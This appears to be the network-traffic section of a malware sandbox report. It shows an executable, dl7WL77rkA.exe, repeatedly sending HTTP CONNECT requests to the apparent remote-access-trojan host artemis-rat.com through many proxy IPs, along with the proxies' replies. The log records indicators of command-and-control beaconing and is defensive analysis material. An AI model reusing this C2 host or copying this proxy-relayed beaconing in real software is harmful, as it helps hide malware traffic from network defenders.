User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.693008900 CET | 116 | IN | HTTP/1.1 200 OK
Date: Mon, 11 Mar 2024 02:30:47 GMT
Server: nginx
Content-Type: text/plain
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1996192.168.2.552051200.35.49.57425413876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.476656914 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.278513908 CET | 202 | IN | HTTP/1.0 404 Not Found
Content-Length: 716
Content-Type: text/html
Date: Wed, 13 Sep 2023 12:45:23 GMT
Expires: Wed, 13 Sep 2023 12:45:23 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1997192.168.2.55536945.11.95.16550493876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.515403986 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1998192.168.2.55537143.133.74.172156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.520713091 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1999192.168.2.55542120.80.103.19331283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.521612883 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:14.899197102 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:15.533926010 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:16.174768925 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:17.453476906 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:20.075948954 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:25.200278044 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:35.438986063 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:31:56.944808006 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:32:37.899543047 CET | 39 | IN | HTTP/1.1 200 Connection established
Mar 11, 2024 03:33:59.819581032 CET | 39 | IN | HTTP/1.1 200 Connection established


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2000192.168.2.555392162.223.91.11803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.521615982 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2001192.168.2.55540944.190.9.65481003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.521616936 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2002192.168.2.551931167.86.69.142453643876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.521960974 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.592603922 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.592852116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2003192.168.2.55196252.80.55.7880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.521960974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.023475885 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2004192.168.2.552021172.93.111.235435203876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.522289991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2005192.168.2.555378167.71.5.8331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.527827024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.069966078 CET28INHTTP/1.1 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2006192.168.2.55539445.191.75.1869993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.534347057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2007192.168.2.55431498.188.47.13241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.566674948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2008192.168.2.55537745.11.95.16560103876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.573149920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2009192.168.2.55402950.63.12.10160953876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.574886084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2010192.168.2.555400149.210.235.10781183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.575947046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.237190962 CET132INHTTP/1.1 503 Too many open connections
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: Maximum number of open connections reached.


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2011192.168.2.55540846.35.9.110803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.579926968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2012192.168.2.554531206.220.175.241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.580033064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2013192.168.2.551933182.53.178.16980803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.581043005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.213829041 CET19INHTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2014192.168.2.551937121.101.131.6711113876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.585273027 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.592639923 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2015192.168.2.555411146.56.154.83210003876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.586790085 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:04.554122925 CET | 55 | IN | HTTP/1.1 0 Connection establish problem (read logs)
Mar 11, 2024 03:31:06.064986944 CET | 55 | IN | HTTP/1.1 0 Connection establish problem (read logs)
Mar 11, 2024 03:31:07.857122898 CET | 55 | IN | HTTP/1.1 0 Connection establish problem (read logs)
Mar 11, 2024 03:31:11.665221930 CET | 55 | IN | HTTP/1.1 0 Connection establish problem (read logs)
Mar 11, 2024 03:31:18.832967043 CET | 55 | IN | HTTP/1.1 0 Connection establish problem (read logs)
Mar 11, 2024 03:31:33.169048071 CET | 55 | IN | HTTP/1.1 0 Connection establish problem (read logs)
Mar 11, 2024 03:32:01.841041088 CET | 55 | IN | HTTP/1.1 0 Connection establish problem (read logs)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2016192.168.2.55545112.186.205.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.607465029 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:47.796958923 CET | 325 | IN | HTTP/1.1 400 Bad Request
Server: nginx/1.14.1
Date: Mon, 11 Mar 2024 02:30:47 GMT
Content-Type: text/html
Content-Length: 173
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2017192.168.2.553927118.163.120.181588373876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.607533932 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:50.608232975 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:53.717896938 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.811491013 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:10.527944088 CET | 19 | IN | HTTP/1.1 200 OK
Mar 11, 2024 03:31:13.528377056 CET | 19 | IN | HTTP/1.1 200 OK
Mar 11, 2024 03:31:19.549166918 CET | 19 | IN | HTTP/1.1 200 OK
Mar 11, 2024 03:31:31.586905956 CET | 19 | IN | HTTP/1.1 200 OK
Mar 11, 2024 03:31:55.665580034 CET | 19 | IN | HTTP/1.1 200 OK
Mar 11, 2024 03:32:43.740575075 CET | 19 | IN | HTTP/1.1 200 OK
Mar 11, 2024 03:34:19.891601086 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2018192.168.2.5554108.217.143.187156733876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.608094931 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2019192.168.2.554019162.214.227.68550293876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.608424902 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.201998949 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2020192.168.2.55540531.170.22.12710803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.613167048 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2021192.168.2.555440212.110.188.213344113876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:47.618300915 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.311294079 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.217921972 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.108208895 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.717664957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.405179024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.014305115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2022192.168.2.55540247.100.236.2380803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.621052980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.960865974 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2023192.168.2.5553988.219.228.100156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.622059107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2024192.168.2.555397123.116.119.175813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.624398947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            2025192.168.2.55541891.189.177.18631283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.633934975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.963453054 CET1286INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/5.7
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:47 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 3628
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Vary: Accept-Language
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from lb1
                                                                                                                                                                                                                                                            X-Cache-Lookup: NONE from lb1:3128
                                                                                                                                                                                                                                                            Via: 1.1 lb1 (squid/5.7)
                                                                                                                                                                                                                                                            Connection: close
